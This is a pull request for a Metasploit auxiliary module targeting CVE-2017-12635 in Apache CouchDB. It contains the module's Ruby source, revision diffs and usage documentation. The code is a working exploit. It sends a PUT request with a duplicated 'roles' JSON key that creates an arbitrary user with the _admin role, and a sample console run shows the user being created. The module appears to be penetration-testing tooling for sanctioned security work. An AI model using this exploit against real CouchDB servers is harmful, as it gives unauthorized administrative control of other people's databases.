### PR TITLE
Add CouchDB arbitrary user creation with roles (CVE-2017-12635)

### DIFF
--- a/documentation/modules/auxiliary/admin/http/couchdb_2017-12635.md
+++ b/documentation/modules/auxiliary/admin/http/couchdb_2017-12635.md
@@ -1,0 +1,50 @@
+## Vulnerable Application
+
+  Apache CouchDB versions between 1.7.0 and 2.x before 2.1.1
+
+## Verification Steps
+
+  1. ```use auxiliary/admin/http/couchdb_2017-12635```
+  2. ```set rhost HOSTNAME``` (required)
+  3. ```set user USERNAME``` (required but random value generated)
+  4. ```set password PASSWORD``` (required. Set to password)
+  5. ```exploit```
+  6.  Generates URL for connecting to CouchDB
+  
+## Options
+
+  - rhost
+  - user
+  - password
+  - uripath
+  - rport
+  - roles
+
+## Scenarios
+
+  ```
+msf > use auxiliary/admin/http/couchdb_2017-12635
+smsf auxiliary(admin/http/couchdb_2017-12635) > set rhost localhost
+rhost => localhost
+msf auxiliary(admin/http/couchdb_2017-12635) > show options
+
+Module options (auxiliary/admin/http/couchdb_2017-12635):
+
+   Name      Current Setting            Required  Description
+   ----      ---------------            --------  -----------
+   PASSWORD  password                   yes       CouchDB Password
+   Proxies                              no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOST     localhost                  yes       CouchDB Host
+   ROLES     _admin                     yes       CouchDB Roles
+   RPORT     5984                       yes       CouchDB Port
+   SSL       false                      no        Negotiate SSL/TLS for outgoing connections
+   URIPATH   /_users/org.couchdb.user:  yes       The base path
+   USER      ZuybcfiIOSlF               yes       CouchDB Username
+   VHOST                                no        HTTP server virtual host
+
+msf auxiliary(admin/http/couchdb_2017-12635) > exploit
+
+[+] User ZuybcfiIOSlF created with password password. Connect to http://localhost:5984/_utils/ to login.
+[*] Auxiliary module execution completed
+
+```

--- a/modules/auxiliary/admin/http/couchdb_2017-12635.rb
+++ b/modules/auxiliary/admin/http/couchdb_2017-12635.rb
@@ -18,7 +18,7 @@ class MetasploitModule < Msf::Auxiliary
           Create arbitrary user and assign to admin role on CouchDB version between 1.7.0 and 2.x before 2.1.1
         },
         'Author' => 'Hendrik Van Belleghem - hendrikvb',
-        'Version' => '0.01',
+        'Version' => '0.02',
         'License' => MSF_LICENSE,
         'References' =>
           [
@@ -33,8 +33,8 @@ class MetasploitModule < Msf::Auxiliary
           OptString.new('URIPATH', [true, 'The base path', '/_users/org.couchdb.user:']),
           OptString.new('RPORT', [true, 'CouchDB Port', '5984']),
           OptString.new('RHOST', [true, 'CouchDB Host', '']),
-          OptString.new('USER', [true, 'CouchDB Username you wish to add to database', Rex::Text.rand_text_alpha(12,"")]),
-          OptString.new('PASSWORD', [true, 'CouchDB Password you wish to add to database', Rex::Text.rand_text_alpha(12,"")]),
+          OptString.new('USER', [true, 'CouchDB Username', Rex::Text.rand_text_alpha(12,"")]),
+          OptString.new('PASSWORD', [true, 'CouchDB Password', 'password']),#Rex::Text.rand_text_alpha(12,"")]),
           OptString.new('ROLES', [true, 'CouchDB Roles', '_admin'])
         ], self.class)
         
@@ -68,7 +68,8 @@ class MetasploitModule < Msf::Auxiliary
       if res && res.code == 200
         print_good("User #{user} created with password #{password}. Connect to http://#{rhost}:#{rport}/_utils/ to login.")
       else
-        print_error("No 200, feeling blue")
+        print_error("Change Failed :(")
       end
     end
   end
+

--- a/modules/auxiliary/admin/http/couchdb_2017-12635.rb
+++ b/modules/auxiliary/admin/http/couchdb_2017-12635.rb
@@ -22,7 +22,7 @@ class MetasploitModule < Msf::Auxiliary
         'License' => MSF_LICENSE,
         'References' =>
           [
-            ['CVE','2017-12635']
+            ['CVE','2017-12635'],
             ['URL','https://cve.mitre.org/cgi-bin/cvename.cgi?name=2017-12635'],
             ['URL','https://justi.cz/security/2017/11/14/couchdb-rce-npm.html'],
           ]
@@ -33,8 +33,8 @@ class MetasploitModule < Msf::Auxiliary
           OptString.new('URIPATH', [true, 'The base path', '/_users/org.couchdb.user:']),
           OptString.new('RPORT', [true, 'CouchDB Port', '5984']),
           OptString.new('RHOST', [true, 'CouchDB Host', '']),
-          OptString.new('USER', [true, 'CouchDB Username', Rex::Text.rand_text_alpha(12,"")]),
-          OptString.new('PASSWORD', [true, 'CouchDB Password', Rex::Text.rand_text_alpha(12,"")]),
+          OptString.new('USER', [true, 'CouchDB Username you wish to add to database', Rex::Text.rand_text_alpha(12,"")]),
+          OptString.new('PASSWORD', [true, 'CouchDB Password you wish to add to database', Rex::Text.rand_text_alpha(12,"")]),
           OptString.new('ROLES', [true, 'CouchDB Roles', '_admin'])
         ], self.class)
         

--- a/modules/auxiliary/admin/http/couchdb_2017-12635.rb
+++ b/modules/auxiliary/admin/http/couchdb_2017-12635.rb
@@ -1,0 +1,74 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class MetasploitModule < Msf::Auxiliary
+
+  Rank = NormalRanking
+  include Msf::Exploit::Remote::HttpClient
+
+    def initialize(info = {})
+      super(update_info(info,
+        'Name' => 'CouchDB user creation with Admin role',
+        'Description' =>
+        %q{
+          Create arbitrary user and assign to admin role on CouchDB version between 1.7.0 and 2.x before 2.1.1
+        },
+        'Author' => 'Hendrik Van Belleghem - hendrikvb',
+        'Version' => '0.01',
+        'License' => MSF_LICENSE,
+        'References' =>
+          [
+            ['CVE','2017-12635']
+            ['URL','https://cve.mitre.org/cgi-bin/cvename.cgi?name=2017-12635'],
+            ['URL','https://justi.cz/security/2017/11/14/couchdb-rce-npm.html'],
+          ]
+      ))
+
+      register_options(
+        [
+          OptString.new('URIPATH', [true, 'The base path', '/_users/org.couchdb.user:']),
+          OptString.new('RPORT', [true, 'CouchDB Port', '5984']),
+          OptString.new('RHOST', [true, 'CouchDB Host', '']),
+          OptString.new('USER', [true, 'CouchDB Username', Rex::Text.rand_text_alpha(12,"")]),
+          OptString.new('PASSWORD', [true, 'CouchDB Password', Rex::Text.rand_text_alpha(12,"")]),
+          OptString.new('ROLES', [true, 'CouchDB Roles', '_admin'])
+        ], self.class)
+        
+    end
+
+    def run 
+      rport = datastore['RPORT']
+      rhost = datastore['RHOST']
+      user = datastore['USER']
+      password = datastore['PASSWORD']
+      roles = datastore['ROLES']
+      useragent = datastore['USERAGENT']
+      timeout = datastore['TIMEOUT']
+      uripath = datastore['URIPATH']
+      
+      data = "{
+\"type\": \"user\",
+\"name\": \"#{user}\",
+\"roles\": [\"#{roles}\"],
+\"roles\": [],
+\"password\": \"#{password}\"
+}"
+      res = send_request_cgi(
+        {
+          'uri'    => "http://#{rhost}:#{rport}#{datastore['uripath']}#{user}", # http://hostname:port/_users/org.couchdb.user:username
+          'method' => 'PUT',
+          'ctype'  => 'text/json',
+          'data'   => data,
+        }, timeout)
+    
+      if res && res.code == 200
+        print_good("User #{user} created with password #{password}. Connect to http://#{rhost}:#{rport}/_utils/ to login.")
+      else
+        print_error("No 200, feeling blue")
+      end
+    end
+  end


### PR DESCRIPTION
Tell us what this change does. If you're fixing a bug, please mention
the github issue number.

## Verification

List the steps needed to make sure this thing works

- [ ] Start `msfconsole`
- [ ] `use auxiliary/admin/http/couchdb_2017-12635`
- [ ] `set rhost localhost`
- [ ] `set user USERNAME`
- [ ] `set password PASSWORD`
- [ ] `exploit`
- [ ] Generates URL for connecting to CouchDB
- [ ] **Verify** the thing does what it should - login with credentials
- [ ] **Verify** the thing does not do what it should not - login with faulty credentials
- [ ] **Document** the thing and how it works ([Example](https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/post/multi/gather/aws_keys.md))

